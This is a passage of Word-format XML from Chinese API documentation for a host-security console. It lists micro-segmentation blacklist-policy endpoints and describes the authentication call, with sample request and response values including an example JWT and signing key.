        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F182ABA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>创建黑名单策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D2C0107" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POST /external/api/ms-srv/api/black-strategy/create</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F54BB78" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F17D30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F5C8BBA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改黑名单策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6950FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POST /external/api/ms-srv/api/black-strategy/update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06C68E8D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70A8E852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE58A34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改黑名单策略开关</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F39C78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POST /external/api/ms-srv/api/black-strategy/update-switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62637D4C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A575A84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="543842A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>删除黑名单策略接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D612209" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DELETE /external/api/ms-srv/api/black-strategy/delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5C4F43B3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DCAB822" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0506BCEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>查看策略主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8AC25C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>GET /external/api/ms-srv/api/black-strategy/strategy-host-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2BE0BBB2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67E502AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离 - 拦截黑名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57A42F63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>查看策略详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50BADDED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>GET /external/api/ms-srv/api/black-strategy/detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="678D5309" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="请求方法"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>请求方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B76307" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="基本请求方法"/>
      <w:r>
        <w:t>基本请求方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5EC675" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>所有api都按照restful请求方式，返回结果都是json数据格式。说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F031D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>url为请求地址，对应的服务器地址为php服务器地址，端口为80，如http://${server}:80/v1/api/auth；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B52647" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>请求业务api之前，需要经过认证请求；业务api请求均需要经过参数签名，详细见下文的认证及签名说明；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A4078" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于GET方式的api，参数统一放在url中进行传递，参数使用page=1&amp;size=50&amp;sorts=id,-name&amp;key1=value1&amp;key2=value2的类似form表单的方式提交。注：sorts字段的约定不写表示升序，"-"表示降序，key1,key2为搜索的参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D80ACA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>对于POST,PUT,DELETE的api，参数统一放在body中进行传递，必须设置Header：ContentType:application/json，返回数据为json格式，各接口的返回详见下文各接口说明；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922E75D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="身份认证"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t>身份认证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B12978E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>在请求业务API之前，需要经过身份验证，获取相关参数，通过后才能请求业务api。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334CE1FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
      <w:r>
        <w:t>POST /v1/api/auth</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1172"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3612"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5415456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78600EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ADE340D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="197FBA28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="033D9E58" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F156FF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0474485F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C09137D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户名，为青藤console系统中的用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C714069" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DF05A3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38C24F1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11621FF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FC0FBC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986B51D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "username": "zhangsan@qingteng.cn",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "test1234"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDEF47F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3756999C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "comId": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "jwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzaWduS2V5IjoiZTAwMzU2NGUzMzliNGEwZjk5ODIxODJlNTg2NWUzYTciLCJjb21JZCI6IjU5MDgwODUxODIzNTkzZTFhODBiIiwidXVpZCI6IjU5MDgwODUxODIzNTkzZTFhODBiIiwiaWF0IjoxNTIyNjQzMjI4OTYyfQ.4koI1tlBZU5_ycpWENH3JyflDRYyUxeb70GdHjrjpYU",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signKey": "e003564e339b4a0f9982182e5865e3a7"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FB79D"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169"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="456E0EF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D43AF84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08B13E9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12BBB07B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2D1B7461" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A3FE621" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="706C4AC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="057D25B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>认证是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DDE0646" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="114C83DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F6B4180" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10BC9648" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>错误码，认证失败时可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0544625B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A37529" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ED2758B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF4328E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>错误描述，认证失败时可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="331C7CCD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B7DFEC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA3B0DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71C524AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A3A2771" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66ECA5CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>jwt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA1A7CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17AF46C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>jwt认证后的token串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A536648" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6407DEE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>signKey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CFF67B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3A8D82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>签名key，参数签名中使用的签名key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C879886" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>认证失败返回的错误码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3229"/>
        <w:gridCol w:w="2924"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5FB568A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8F30147" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>错误码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D84EE44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B9E65A2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D7C2F6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>LOGIN_ERROR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303425E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A59148D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66ADCE77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>HEADER_NULL_COM_ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34D6AA89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>comId请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6065D4E4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36762357" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>HEADER_NULL_TIMESTAMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D368A55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>timestamp请求头不能为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="567DCD53" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA50BF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>HEADER_NULL_SIGN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
